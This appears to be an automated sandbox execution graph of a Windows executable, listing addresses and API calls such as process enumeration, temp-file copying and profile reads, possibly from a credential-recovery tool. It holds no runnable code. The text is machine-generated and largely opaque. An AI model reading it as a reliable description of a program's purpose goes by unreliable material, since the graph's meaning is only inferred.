                                                                                                                                                                          execution_graph 37879 44660a 37882 4465e4 37879->37882 37881 446613 37883 4465f3 __dllonexit 37882->37883 37884 4465ed _onexit 37882->37884 37883->37881 37884->37883 37671 442ec6 19 API calls 37848 4152c6 malloc 37849 4152e2 37848->37849 37850 4152ef 37848->37850 37852 416760 11 API calls 37850->37852 37852->37849 37853 4232e8 37854 4232ef 37853->37854 37857 415b2c 37854->37857 37856 423305 37858 415b46 37857->37858 37859 415b42 37857->37859 37858->37856 37859->37858 37860 415b94 37859->37860 37862 415b5a 37859->37862 37864 4438b5 37860->37864 37862->37858 37863 415b79 memcpy 37862->37863 37863->37858 37865 4438d0 37864->37865 37875 4438c9 37864->37875 37878 415378 memcpy memcpy 37865->37878 37875->37858 37885 4466f4 37904 446904 37885->37904 37887 446700 GetModuleHandleA 37890 446710 __set_app_type __p__fmode __p__commode 37887->37890 37889 4467a4 37891 4467ac __setusermatherr 37889->37891 37892 4467b8 37889->37892 37890->37889 37891->37892 37905 4468f0 _controlfp 37892->37905 37894 4467bd _initterm __wgetmainargs _initterm 37895 44681e GetStartupInfoW 37894->37895 37896 446810 37894->37896 37898 446866 GetModuleHandleA 37895->37898 37906 41276d 37898->37906 37902 446896 exit 37903 44689d _cexit 37902->37903 37903->37896 37904->37887 37905->37894 37907 41277d 37906->37907 37949 4044a4 LoadLibraryW 37907->37949 37909 412785 37941 412789 37909->37941 37957 414b81 37909->37957 37912 4127c8 37963 412465 memset ??2@YAPAXI 37912->37963 37914 4127ea 37975 40ac21 37914->37975 37919 412813 37993 40dd07 memset 37919->37993 37920 412827 37998 40db69 memset 37920->37998 37924 412822 38020 4125b6 ??3@YAXPAX DeleteObject 37924->38020 37925 40ada2 _wcsicmp 37926 41283d 37925->37926 37926->37924 37929 412863 CoInitialize 37926->37929 38003 41268e 37926->38003 37928 412966 38021 40b1ab free free 37928->38021 38019 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37929->38019 37933 41296f 38022 40b633 37933->38022 37935 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37940 412957 CoUninitialize 37935->37940 37946 4128ca 37935->37946 37940->37924 37941->37902 37941->37903 37942 4128d0 TranslateAcceleratorW 37943 412941 GetMessageW 37942->37943 37942->37946 37943->37940 37943->37942 37944 412909 IsDialogMessageW 37944->37943 37944->37946 37945 4128fd IsDialogMessageW 37945->37943 37945->37944 37946->37942 37946->37944 37946->37945 37947 41292b TranslateMessage DispatchMessageW 37946->37947 37948 41291f IsDialogMessageW 37946->37948 37947->37943 37948->37943 37948->37947 37950 4044cf GetProcAddress 37949->37950 37953 4044f7 37949->37953 37951 4044e8 FreeLibrary 37950->37951 37954 4044df 37950->37954 37952 4044f3 37951->37952 37951->37953 37952->37953 37955 404507 MessageBoxW 37953->37955 37956 40451e 37953->37956 37954->37951 37955->37909 37956->37909 37958 414b8a 37957->37958 37959 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37957->37959 38026 40a804 memset 37958->38026 37959->37912 37962 414b9e GetProcAddress 37962->37959 37964 4124e0 37963->37964 37965 412505 ??2@YAPAXI 37964->37965 37966 41251c 37965->37966 37968 412521 37965->37968 38048 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37966->38048 38037 444722 37968->38037 37974 41259b wcscpy 37974->37914 38053 40b1ab free free 37975->38053 37979 40a9ce malloc memcpy free free 37986 40ac5c 37979->37986 37980 40ad4b 37988 40ad76 37980->37988 38066 40a9ce 37980->38066 37982 40ace7 free 37982->37986 37986->37979 37986->37980 37986->37982 37986->37988 38057 40a8d0 7 API calls 37986->38057 38058 4099f4 37986->38058 38054 40aa04 37988->38054 37989 40ada2 37990 40adc9 37989->37990 37991 40adaa 37989->37991 37990->37919 37990->37920 37991->37990 37992 40adb3 _wcsicmp 37991->37992 37992->37990 37992->37991 38072 40dce0 37993->38072 37995 40dd3a GetModuleHandleW 38077 40dba7 37995->38077 37999 40dce0 3 API calls 37998->37999 38000 40db99 37999->38000 38149 40dae1 38000->38149 38163 402f3a 38003->38163 38005 412766 38005->37924 38005->37929 38006 4126d3 _wcsicmp 38007 4126a8 38006->38007 38007->38005 38007->38006 38009 41270a 38007->38009 38198 4125f8 7 API calls 38007->38198 38009->38005 38166 411ac5 38009->38166 38019->37935 38020->37928 38021->37933 38023 40b640 38022->38023 38024 40b639 free 38022->38024 38025 40b1ab free free 38023->38025 38024->38023 38025->37941 38027 40a83b GetSystemDirectoryW 38026->38027 38028 40a84c wcscpy 38026->38028 38027->38028 38033 409719 wcslen 38028->38033 38031 40a881 LoadLibraryW 38032 40a886 38031->38032 38032->37959 38032->37962 38034 409724 38033->38034 38035 409739 wcscat LoadLibraryW 38033->38035 38034->38035 38036 40972c wcscat 38034->38036 38035->38031 38035->38032 38036->38035 38038 444732 38037->38038 38039 444728 DeleteObject 38037->38039 38049 409cc3 38038->38049 38039->38038 38041 412551 38042 4010f9 38041->38042 38043 401130 38042->38043 38044 401134 GetModuleHandleW LoadIconW 38043->38044 38045 401107 wcsncat 38043->38045 38046 40a7be 38044->38046 38045->38043 38047 40a7d2 38046->38047 38047->37974 38047->38047 38048->37968 38052 409bfd memset wcscpy 38049->38052 38051 409cdb CreateFontIndirectW 38051->38041 38052->38051 38053->37986 38055 40aa14 38054->38055 38056 40aa0a free 38054->38056 38055->37989 38056->38055 38057->37986 38059 409a41 38058->38059 38060 4099fb malloc 38058->38060 38059->37986 38062 409a37 38060->38062 38063 409a1c 38060->38063 38062->37986 38064 409a30 free 38063->38064 38065 409a20 memcpy 38063->38065 38064->38062 38065->38064 38067 40a9e7 38066->38067 38068 40a9dc free 38066->38068 38070 4099f4 3 API calls 38067->38070 38069 40a9f2 38068->38069 38071 40a8d0 7 API calls 38069->38071 38070->38069 38071->37988 38096 409bca GetModuleFileNameW 38072->38096 38074 40dce6 wcsrchr 38075 40dcf5 38074->38075 38076 40dcf9 wcscat 38074->38076 38075->38076 38076->37995 38097 44db70 38077->38097 38081 40dbfd 38100 4447d9 38081->38100 38084 40dc34 wcscpy wcscpy 38126 40d6f5 38084->38126 38085 40dc1f wcscpy 38085->38084 38088 40d6f5 3 API calls 38089 40dc73 38088->38089 38090 40d6f5 3 API calls 38089->38090 38091 40dc89 38090->38091 38092 40d6f5 3 API calls 38091->38092 38093 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38092->38093 38132 40da80 38093->38132 38096->38074 38098 40dbb4 memset memset 38097->38098 38099 409bca GetModuleFileNameW 38098->38099 38099->38081 38102 4447f4 38100->38102 38101 40dc1b 38101->38084 38101->38085 38102->38101 38103 444807 ??2@YAPAXI 38102->38103 38104 44481f 38103->38104 38105 444873 _snwprintf 38104->38105 38106 4448ab wcscpy 38104->38106 38139 44474a 8 API calls 38105->38139 38108 4448bb 38106->38108 38140 44474a 8 API calls 38108->38140 38109 4448a7 38109->38106 38109->38108 38111 4448cd 38141 44474a 8 API calls 38111->38141 38113 4448e2 38142 44474a 8 API calls 38113->38142 38115 4448f7 38143 44474a 8 API calls 38115->38143 38117 44490c 38144 44474a 8 API calls 38117->38144 38119 444921 38145 44474a 8 API calls 38119->38145 38121 444936 38146 44474a 8 API calls 38121->38146 38123 44494b 38147 44474a 8 API calls 38123->38147 38125 444960 ??3@YAXPAX 38125->38101 38127 44db70 38126->38127 38128 40d702 memset GetPrivateProfileStringW 38127->38128 38129 40d752 38128->38129 38130 40d75c WritePrivateProfileStringW 38128->38130 38129->38130 38131 40d758 38129->38131 38130->38131 38131->38088 38133 44db70 38132->38133 38134 40da8d memset 38133->38134 38135 40daac LoadStringW 38134->38135 38136 40dac6 38135->38136 38136->38135 38137 40dade 38136->38137 38148 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38136->38148 38137->37924 38139->38109 38140->38111 38141->38113 38142->38115 38143->38117 38144->38119 38145->38121 38146->38123 38147->38125 38148->38136 38159 409b98 GetFileAttributesW 38149->38159 38151 40daea 38152 40db63 38151->38152 38153 40daef wcscpy wcscpy GetPrivateProfileIntW 38151->38153 38152->37925 38160 40d65d GetPrivateProfileStringW 38153->38160 38155 40db3e 38161 40d65d GetPrivateProfileStringW 38155->38161 38157 40db4f 38162 40d65d GetPrivateProfileStringW 38157->38162 38159->38151 38160->38155 38161->38157 38162->38152 38199 40eaff 38163->38199 38167 411ae2 memset 38166->38167 38168 411b8f 38166->38168 38239 409bca GetModuleFileNameW 38167->38239 38180 411a8b 38168->38180 38170 411b0a wcsrchr 38171 411b22 wcscat 38170->38171 38172 411b1f 38170->38172 38240 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38171->38240 38172->38171 38174 411b67 38241 402afb 38174->38241 38178 411b7f 38297 40ea13 SendMessageW memset SendMessageW 38178->38297 38181 402afb 27 API calls 38180->38181 38182 411ac0 38181->38182 38183 4110dc 38182->38183 38184 41113e 38183->38184 38189 4110f0 38183->38189 38322 40969c LoadCursorW SetCursor 38184->38322 38186 411143 38197 40b04b ??3@YAXPAX 38186->38197 38323 444a54 38186->38323 38326 4032b4 38186->38326 38187 4110f7 _wcsicmp 38187->38189 38188 411157 38190 40ada2 _wcsicmp 38188->38190 38189->38184 38189->38187 38344 410c46 10 API calls 38189->38344 38193 411167 38190->38193 38191 4111af 38193->38191 38194 4111a6 qsort 38193->38194 38194->38191 38197->38188 38198->38007 38200 40eb10 38199->38200 38212 40e8e0 38200->38212 38203 40eb6c memcpy memcpy 38204 40ebb7 38203->38204 38204->38203 38205 40ebf2 ??2@YAPAXI ??2@YAPAXI 38204->38205 38207 40d134 16 API calls 38204->38207 38206 40ec2e ??2@YAPAXI 38205->38206 38209 40ec65 38205->38209 38206->38209 38207->38204 38209->38209 38222 40ea7f 38209->38222 38211 402f49 38211->38007 38213 40e8f2 38212->38213 38214 40e8eb ??3@YAXPAX 38212->38214 38215 40e900 38213->38215 38216 40e8f9 ??3@YAXPAX 38213->38216 38214->38213 38217 40e911 38215->38217 38218 40e90a ??3@YAXPAX 38215->38218 38216->38215 38219 40e931 ??2@YAPAXI ??2@YAPAXI 38217->38219 38220 40e921 ??3@YAXPAX 38217->38220 38221 40e92a ??3@YAXPAX 38217->38221 38218->38217 38219->38203 38220->38221 38221->38219 38223 40aa04 free 38222->38223 38224 40ea88 38223->38224 38225 40aa04 free 38224->38225 38226 40ea90 38225->38226 38227 40aa04 free 38226->38227 38228 40ea98 38227->38228 38229 40aa04 free 38228->38229 38230 40eaa0 38229->38230 38231 40a9ce 4 API calls 38230->38231 38232 40eab3 38231->38232 38233 40a9ce 4 API calls 38232->38233 38234 40eabd 38233->38234 38235 40a9ce 4 API calls 38234->38235 38236 40eac7 38235->38236 38237 40a9ce 4 API calls 38236->38237 38238 40ead1 38237->38238 38238->38211 38239->38170 38240->38174 38298 40b2cc 38241->38298 38243 402b0a 38244 40b2cc 27 API calls 38243->38244 38245 402b23 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402b3a 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402b54 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402b6b 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402b82 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402b99 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402bb0 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402bc7 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402bde 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402bf5 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402c0c 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402c23 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402c3a 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402c51 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402c68 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402c7f 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402c99 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402cb3 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402cd5 38280->38281 38282 40b2cc 27 API calls 38281->38282 38283 402cf0 38282->38283 38284 40b2cc 27 API calls 38283->38284 38285 402d0b 38284->38285 38286 40b2cc 27 API calls 38285->38286 38287 402d26 38286->38287 38288 40b2cc 27 API calls 38287->38288 38289 402d3e 38288->38289 38290 40b2cc 27 API calls 38289->38290 38291 402d59 38290->38291 38292 40b2cc 27 API calls 38291->38292 38293 402d78 38292->38293 38294 40b2cc 27 API calls 38293->38294 38295 402d93 38294->38295 38296 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38295->38296 38296->38178 38297->38168 38301 40b58d 38298->38301 38300 40b2d1 38300->38243 38302 40b5a4 GetModuleHandleW FindResourceW 38301->38302 38303 40b62e 38301->38303 38304 40b5c2 LoadResource 38302->38304 38306 40b5e7 38302->38306 38303->38300 38305 40b5d0 SizeofResource LockResource 38304->38305 38304->38306 38305->38306 38306->38303 38314 40afcf 38306->38314 38308 40b608 memcpy 38317 40b4d3 memcpy 38308->38317 38310 40b61e 38318 40b3c1 18 API calls 38310->38318 38312 40b626 38319 40b04b 38312->38319 38315 40b04b ??3@YAXPAX 38314->38315 38316 40afd7 ??2@YAPAXI 38315->38316 38316->38308 38317->38310 38318->38312 38320 40b051 ??3@YAXPAX 38319->38320 38321 40b05f 38319->38321 38320->38321 38321->38303 38322->38186 38324 444a64 FreeLibrary 38323->38324 38325 444a83 38323->38325 38324->38325 38325->38188 38327 4032c4 38326->38327 38328 40b633 free 38327->38328 38329 403316 38328->38329 38345 44553b 38329->38345 38333 403480 38543 40368c 15 API calls 38333->38543 38335 403489 38336 40b633 free 38335->38336 38337 403495 38336->38337 38337->38188 38338 4033a9 memset memcpy 38339 4033ec wcscmp 38338->38339 38340 40333c 38338->38340 38339->38340 38340->38333 38340->38338 38340->38339 38541 4028e7 11 API calls 38340->38541 38542 40f508 6 API calls 38340->38542 38342 403421 _wcsicmp 38342->38340 38344->38189 38346 445548 38345->38346 38347 445599 38346->38347 38544 40c768 38346->38544 38348 4455a8 memset 38347->38348 38355 4457f2 38347->38355 38628 403988 38348->38628 38359 445854 38355->38359 38731 403e2d memset memset memset memset memset 38355->38731 38356 445672 38639 403fbe memset memset memset memset memset 38356->38639 38357 4458bb memset memset 38362 414c2e 17 API calls 38357->38362 38407 4458aa 38359->38407 38754 403c9c memset memset memset memset memset 38359->38754 38360 44595e memset memset 38365 414c2e 17 API calls 38360->38365 38361 4455e5 38361->38356 38369 44560f 38361->38369 38366 4458f9 38362->38366 38364 445a00 memset memset 38376 414c2e 17 API calls 38364->38376 38377 44599c 38365->38377 38378 40b2cc 27 API calls 38366->38378 38367 44557a 38404 44558c 38367->38404 38608 4136c0 38367->38608 38381 4087b3 338 API calls 38369->38381 38371 445849 38822 40b1ab free free 38371->38822 38372 445bca 38379 445c8b memset memset 38372->38379 38446 445cf0 38372->38446 38373 445b38 memset memset memset 38384 445bd4 38373->38384 38385 445b98 38373->38385 38386 445a3e 38376->38386 38388 40b2cc 27 API calls 38377->38388 38380 445909 38378->38380 38392 414c2e 17 API calls 38379->38392 38389 409d1f 6 API calls 38380->38389 38390 445621 38381->38390 38383 44589f 38823 40b1ab free free 38383->38823 38777 414c2e 38384->38777 38385->38384 38394 445ba2 38385->38394 38397 40b2cc 27 API calls 38386->38397 38391 4459ac 38388->38391 38400 445919 38389->38400 38808 4454bf 20 API calls 38390->38808 38402 409d1f 6 API calls 38391->38402 38403 445cc9 38392->38403 38915 4099c6 wcslen 38394->38915 38395 4456b2 38810 40b1ab free free 38395->38810 38408 445a4f 38397->38408 38399 403335 38540 4452e5 45 API calls 38399->38540 38824 409b98 GetFileAttributesW 38400->38824 38401 445823 38401->38371 38414 4087b3 338 API calls 38401->38414 38416 4459bc 38402->38416 38417 409d1f 6 API calls 38403->38417 38612 444b06 38404->38612 38405 445879 38405->38383 38427 4087b3 338 API calls 38405->38427 38407->38357 38432 44594a 38407->38432 38420 409d1f 6 API calls 38408->38420 38411 445d3d 38431 40b2cc 27 API calls 38411->38431 38412 445d88 memset memset memset 38415 414c2e 17 API calls 38412->38415 38414->38401 38424 445dde 38415->38424 38891 409b98 GetFileAttributesW 38416->38891 38426 445ce1 38417->38426 38418 445bb3 38918 445403 memset 38418->38918 38419 445680 38419->38395 38662 4087b3 memset 38419->38662 38429 445a63 38420->38429 38421 40b2cc 27 API calls 38430 445bf3 38421->38430 38422 445928 38422->38432 38825 40b6ef 38422->38825 38433 40b2cc 27 API calls 38424->38433 38935 409b98 GetFileAttributesW 38426->38935 38427->38405 38438 40b2cc 27 API calls 38429->38438 38793 409d1f wcslen wcslen 38430->38793 38441 445d54 _wcsicmp 38431->38441 38432->38360 38445 4459ed 38432->38445 38444 445def 38433->38444 38434 4459cb 38434->38445 38455 40b6ef 253 API calls 38434->38455 38448 445a94 38438->38448 38452 445d71 38441->38452 38518 445d67 38441->38518 38443 445665 38809 40b1ab free free 38443->38809 38453 409d1f 6 API calls 38444->38453 38445->38364 38488 445b22 38445->38488 38446->38399 38446->38411 38446->38412 38447 445389 259 API calls 38447->38372 38892 40ae18 38448->38892 38449 44566d 38449->38355 38713 413d4c 38449->38713 38936 445093 23 API calls 38452->38936 38461 445e03 38453->38461 38455->38445 38457 4456d8 38462 40b2cc 27 API calls 38457->38462 38460 44563c 38460->38443 38465 4087b3 338 API calls 38460->38465 38937 409b98 GetFileAttributesW 38461->38937 38468 4456e2 38462->38468 38463 40b2cc 27 API calls 38469 445c23 38463->38469 38464 445d83 38464->38399 38465->38460 38467 40b6ef 253 API calls 38467->38399 38811 413fa6 _wcsicmp _wcsicmp 38468->38811 38473 409d1f 6 API calls 38469->38473 38471 445e12 38478 445e6b 38471->38478 38484 40b2cc 27 API calls 38471->38484 38476 445c37 38473->38476 38474 445aa1 38477 445b17 38474->38477 38492 445ab2 memset 38474->38492 38506 409d1f 6 API calls 38474->38506 38514 445389 259 API calls 38474->38514 38899 40add4 38474->38899 38904 40ae51 38474->38904 38475 4456eb 38480 4456fd memset memset memset memset 38475->38480 38481 4457ea 38475->38481 38482 445389 259 API calls 38476->38482 38912 40aebe 38477->38912 38939 445093 23 API calls 38478->38939 38812 409c70 wcscpy wcsrchr 38480->38812 38815 413d29 38481->38815 38487 445c47 38482->38487 38489 445e33 38484->38489 38494 40b2cc 27 API calls 38487->38494 38488->38372 38488->38373 38495 409d1f 6 API calls 38489->38495 38491 445e7e 38496 445f67 38491->38496 38497 40b2cc 27 API calls 38492->38497 38499 445c53 38494->38499 38500 445e47 38495->38500 38501 40b2cc 27 API calls 38496->38501 38497->38474 38498 409c70 2 API calls 38502 44577e 38498->38502 38503 409d1f 6 API calls 38499->38503 38938 409b98 GetFileAttributesW 38500->38938 38505 445f73 38501->38505 38507 409c70 2 API calls 38502->38507 38508 445c67 38503->38508 38510 409d1f 6 API calls 38505->38510 38506->38474 38511 44578d 38507->38511 38512 445389 259 API calls 38508->38512 38509 445e56 38509->38478 38515 445e83 memset 38509->38515 38513 445f87 38510->38513 38511->38481 38517 40b2cc 27 API calls 38511->38517 38512->38372 38942 409b98 GetFileAttributesW 38513->38942 38514->38474 38519 40b2cc 27 API calls 38515->38519 38521 4457a8 38517->38521 38518->38399 38518->38467 38520 445eab 38519->38520 38522 409d1f 6 API calls 38520->38522 38523 409d1f 6 API calls 38521->38523 38524 445ebf 38522->38524 38525 4457b8 38523->38525 38526 40ae18 9 API calls 38524->38526 38814 409b98 GetFileAttributesW 38525->38814 38536 445ef5 38526->38536 38528 4457c7 38528->38481 38530 4087b3 338 API calls 38528->38530 38529 40ae51 9 API calls 38529->38536 38530->38481 38531 445f5c 38533 40aebe FindClose 38531->38533 38532 40add4 2 API calls 38532->38536 38533->38496 38534 40b2cc 27 API calls 38534->38536 38535 409d1f 6 API calls 38535->38536 38536->38529 38536->38531 38536->38532 38536->38534 38536->38535 38538 445f3a 38536->38538 38940 409b98 GetFileAttributesW 38536->38940 38941 445093 23 API calls 38538->38941 38540->38340 38541->38342 38542->38340 38543->38335 38545 40c775 38544->38545 38943 40b1ab free free 38545->38943 38547 40c788 38944 40b1ab free free 38547->38944 38549 40c790 38945 40b1ab free free 38549->38945 38551 40c798 38552 40aa04 free 38551->38552 38553 40c7a0 38552->38553 38946 40c274 memset 38553->38946 38558 40a8ab 9 API calls 38559 40c7c3 38558->38559 38560 40a8ab 9 API calls 38559->38560 38561 40c7d0 38560->38561 38975 40c3c3 38561->38975 38565 40c877 38574 40bdb0 38565->38574 38566 40c86c 39003 4053fe 39 API calls 38566->39003 38568 40c7e5 38568->38565 38568->38566 39000 40a706 wcslen memcpy 38568->39000 39002 40c634 50 API calls 38568->39002 38570 40c813 _wcslwr 39001 40c634 50 API calls 38570->39001 38572 40c829 wcslen 38572->38568 39167 404363 38574->39167 38576 40bf5d 39187 40440c 38576->39187 38580 40b2cc 27 API calls 38581 40be02 wcslen 38580->38581 38581->38576 38583 40be1e 38581->38583 38582 40be26 wcsncmp 38582->38583 38583->38576 38583->38582 38586 40be7d memset 38583->38586 38587 40bea7 memcpy 38583->38587 38588 40bf11 wcschr 38583->38588 38589 40b2cc 27 API calls 38583->38589 38591 40bf43 LocalFree 38583->38591 39190 40bd5d 28 API calls 38583->39190 39191 404423 38583->39191 38586->38583 38586->38587 38587->38583 38587->38588 38588->38583 38590 40bef6 _wcsnicmp 38589->38590 38590->38583 38590->38588 38591->38583 38592 4135f7 39206 4135e0 38592->39206 38595 40b2cc 27 API calls 38596 41360d 38595->38596 38597 40a804 8 API calls 38596->38597 38598 413613 38597->38598 38599 41363e 38598->38599 38600 40b273 27 API calls 38598->38600 38601 4135e0 FreeLibrary 38599->38601 38602 413625 GetProcAddress 38600->38602 38603 413643 38601->38603 38602->38599 38604 413648 38602->38604 38603->38367 38605 413658 38604->38605 38606 4135e0 FreeLibrary 38604->38606 38605->38367 38607 413666 38606->38607 38607->38367 38610 4136e2 38608->38610 38609 413827 38807 41366b FreeLibrary 38609->38807 38610->38609 38611 4137ac CoTaskMemFree 38610->38611 38611->38610 39209 4449b9 38612->39209 38615 444c1f 38615->38347 38616 4449b9 42 API calls 38618 444b4b 38616->38618 38617 444c15 38618->38617 39230 444972 GetVersionExW 38618->39230 38629 40399d 38628->38629 39235 403a16 38629->39235 38631 403a09 39249 40b1ab free free 38631->39249 38633 4039a3 38633->38631 38637 4039f4 38633->38637 39246 40a02c CreateFileW 38633->39246 38634 403a12 wcsrchr 38634->38361 38637->38631 38638 4099c6 2 API calls 38637->38638 38638->38631 38640 414c2e 17 API calls 38639->38640 38641 404048 38640->38641 38642 414c2e 17 API calls 38641->38642 38643 404056 38642->38643 38644 409d1f 6 API calls 38643->38644 38645 404073 38644->38645 38646 409d1f 6 API calls 38645->38646 38647 40408e 38646->38647 38648 409d1f 6 API calls 38647->38648 38649 4040a6 38648->38649 38650 403af5 20 API calls 38649->38650 38651 4040ba 38650->38651 38652 403af5 20 API calls 38651->38652 38653 4040cb 38652->38653 39276 40414f memset 38653->39276 38655 404140 39290 40b1ab free free 38655->39290 38657 4040ec memset 38660 4040e0 38657->38660 38658 404148 38658->38419 38659 4099c6 2 API calls 38659->38660 38660->38655 38660->38657 38660->38659 38661 40a8ab 9 API calls 38660->38661 38661->38660 39303 40a6e6 WideCharToMultiByte 38662->39303 38664 4087ed 39304 4095d9 memset 38664->39304 38667 408953 38667->38419 38668 408809 memset memset memset memset memset 38669 40b2cc 27 API calls 38668->38669 38670 4088a1 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 4088b1 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 4088c0 38673->38674 38675 409d1f 6 API calls 38674->38675 38676 4088d0 38675->38676 38677 40b2cc 27 API calls 38676->38677 38714 40b633 free 38713->38714 38715 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38714->38715 38716 413f00 Process32NextW 38715->38716 38717 413da5 OpenProcess 38716->38717 38718 413f17 CloseHandle 38716->38718 38719 413df3 memset 38717->38719 38723 413eb0 38717->38723 38718->38457 39353 413f27 38719->39353 38721 413ebf free 38721->38723 38722 413e1f 38725 413e37 GetModuleHandleW 38722->38725 38728 413e6a QueryFullProcessImageNameW 38722->38728 39358 413959 38722->39358 39374 413ca4 38722->39374 38723->38716 38723->38721 38724 4099f4 3 API calls 38723->38724 38724->38723 38725->38722 38727 413e46 GetProcAddress 38725->38727 38727->38722 38728->38722 38730 413ea2 CloseHandle 38730->38723 38732 414c2e 17 API calls 38731->38732 38733 403eb7 38732->38733 38734 414c2e 17 API calls 38733->38734 38735 403ec5 38734->38735 38736 409d1f 6 API calls 38735->38736 38737 403ee2 38736->38737 38738 409d1f 6 API calls 38737->38738 38739 403efd 38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403f15 38740->38741 38742 403af5 20 API calls 38741->38742 38743 403f29 38742->38743 38744 403af5 20 API calls 38743->38744 38745 403f3a 38744->38745 38746 40414f 33 API calls 38745->38746 38747 403f4f 38746->38747 38748 403faf 38747->38748 38749 403f5b memset 38747->38749 38752 4099c6 2 API calls 38747->38752 38753 40a8ab 9 API calls 38747->38753 39388 40b1ab free free 38748->39388 38749->38747 38751 403fb7 38751->38401 38752->38747 38753->38747 38755 414c2e 17 API calls 38754->38755 38756 403d26 38755->38756 38757 414c2e 17 API calls 38756->38757 38758 403d34 38757->38758 38759 409d1f 6 API calls 38758->38759 38760 403d51 38759->38760 38761 409d1f 6 API calls 38760->38761 38762 403d6c 38761->38762 38763 409d1f 6 API calls 38762->38763 38764 403d84 38763->38764 38765 403af5 20 API calls 38764->38765 38766 403d98 38765->38766 38767 403af5 20 API calls 38766->38767 38768 403da9 38767->38768 38769 40414f 33 API calls 38768->38769 38770 403dbe 38769->38770 38771 403e1e 38770->38771 38773 403dca memset 38770->38773 38775 4099c6 2 API calls 38770->38775 38776 40a8ab 9 API calls 38770->38776 39389 40b1ab free free 38771->39389 38773->38770 38774 403e26 38774->38405 38775->38770 38776->38770 38778 414b81 9 API calls 38777->38778 38779 414c40 38778->38779 38780 414c73 memset 38779->38780 39390 409cea 38779->39390 38781 414c94 38780->38781 39393 414592 RegOpenKeyExW 38781->39393 38785 414c64 SHGetSpecialFolderPathW 38786 414d0b 38785->38786 38786->38421 38787 414cc1 38788 414cf4 wcscpy 38787->38788 39394 414bb0 wcscpy 38787->39394 38788->38786 38790 414cd2 39395 4145ac RegQueryValueExW 38790->39395 38792 414ce9 RegCloseKey 38792->38788 38794 409d62 38793->38794 38795 409d43 wcscpy 38793->38795 38798 445389 38794->38798 38796 409719 2 API calls 38795->38796 38797 409d51 wcscat 38796->38797 38797->38794 38799 40ae18 9 API calls 38798->38799 38805 4453c4 38799->38805 38800 40ae51 9 API calls 38800->38805 38801 4453f3 38803 40aebe FindClose 38801->38803 38802 40add4 2 API calls 38802->38805 38804 4453fe 38803->38804 38804->38463 38805->38800 38805->38801 38805->38802 38806 445403 254 API calls 38805->38806 38806->38805 38807->38404 38808->38460 38809->38449 38810->38449 38811->38475 38813 409c89 38812->38813 38813->38498 38814->38528 38816 413d39 38815->38816 38817 413d2f FreeLibrary 38815->38817 38818 40b633 free 38816->38818 38817->38816 38819 413d42 38818->38819 38820 40b633 free 38819->38820 38821 413d4a 38820->38821 38821->38355 38822->38359 38823->38407 38824->38422 38826 44db70 38825->38826 38827 40b6fc memset 38826->38827 38828 409c70 2 API calls 38827->38828 38829 40b732 wcsrchr 38828->38829 38830 40b743 38829->38830 38831 40b746 memset 38829->38831 38830->38831 38832 40b2cc 27 API calls 38831->38832 38833 40b76f 38832->38833 38834 409d1f 6 API calls 38833->38834 38835 40b783 38834->38835 39396 409b98 GetFileAttributesW 38835->39396 38837 40b792 38838 40b7c2 38837->38838 38839 409c70 2 API calls 38837->38839 39397 40bb98 38838->39397 38841 40b7a5 38839->38841 38843 40b2cc 27 API calls 38841->38843 38846 40b7b2 38843->38846 38844 40b837 CloseHandle 38848 40b83e memset 38844->38848 38845 40b817 39500 409a45 GetTempPathW 38845->39500 38849 409d1f 6 API calls 38846->38849 39430 40a6e6 WideCharToMultiByte 38848->39430 38849->38838 38850 40b827 CopyFileW 38850->38848 38852 40b866 39431 444432 38852->39431 38855 40bad5 38857 40baeb 38855->38857 38858 40bade DeleteFileW 38855->38858 38856 40b273 27 API calls 38859 40b89a 38856->38859 38860 40b04b ??3@YAXPAX 38857->38860 38858->38857 39477 438552 38859->39477 38862 40baf3 38860->38862 38862->38432 38864 40bacd 39480 443d90 38864->39480 38867 40bac6 39530 424f26 123 API calls 38867->39530 38868 40b8bd memset 39521 425413 17 API calls 38868->39521 38871 425413 17 API calls 38889 40b8b8 38871->38889 38874 40a71b MultiByteToWideChar 38874->38889 38875 40a734 MultiByteToWideChar 38875->38889 38878 40b9b5 memcmp 38878->38889 38879 4099c6 2 API calls 38879->38889 38880 404423 38 API calls 38880->38889 38883 40bb3e memset memcpy 39531 40a734 MultiByteToWideChar 38883->39531 38884 4251c4 137 API calls 38884->38889 38886 40bb88 LocalFree 38886->38889 38889->38867 38889->38868 38889->38871 38889->38874 38889->38875 38889->38878 38889->38879 38889->38880 38889->38883 38889->38884 38890 40ba5f memcmp 38889->38890 39522 4253ef 16 API calls 38889->39522 39523 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38889->39523 39524 4253af 17 API calls 38889->39524 39525 4253cf 17 API calls 38889->39525 39526 447280 memset 38889->39526 39527 447960 memset memcpy memcpy memcpy 38889->39527 39528 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38889->39528 39529 447920 memcpy memcpy memcpy 